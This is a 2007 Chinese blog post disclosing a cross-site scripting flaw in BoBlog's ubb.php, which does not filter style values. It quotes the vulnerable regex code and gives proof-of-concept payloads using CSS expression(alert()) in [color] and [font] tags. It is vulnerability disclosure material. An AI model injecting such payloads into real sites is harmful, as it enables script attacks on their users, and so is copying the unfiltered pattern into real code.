百度空间 | 百度首页 
 
查看文章
 
BoBlog跨站漏洞
2007年05月20日 星期日 16:43
漏洞发现者是lib3rt3,我帮他待发罢了。

BoBlog跨站漏洞
今天抽空看了下Boblog的代码,发现了个跨站漏洞,影响最新版,目前官方没出补丁(呵呵,貌似偶有点不厚道), 看下ubb.php的代码:
Copy code
$regubb_search = array(
.......
"/\[color=([^\[\<]+?)\](.+?)\[\/color\]/i",
"/\[font=([^\[\<]+?)\](.+?)\[\/font\]/i",
.......
);
$regubb_replace = array(
.......
"<span style=\"color: \\2\\1;\">\\2</span>",
"<span style=\"font-family: \\2\\1;\">\\2</span>",
.......
);
$str=preg_replace($regubb_search, $regubb_replace, $str);


哈哈,没有对style里的东东过滤,在评论或留言处写:
Copy code
[color=expression(alert())]lib3rt3[/color]


至于跨站的具体利用,我想大家都比我明白:)

官方只知道处理color,没处理font,

Copy code
[font=expression(alert())]lib3rt3[/font]

类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (1)
 
最近读者:
 
网友评论:
1
2007年05月20日 星期日 19:41 | 回复
第1次来你的BLOG 感觉不错  漏洞更新的很快  谢谢
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu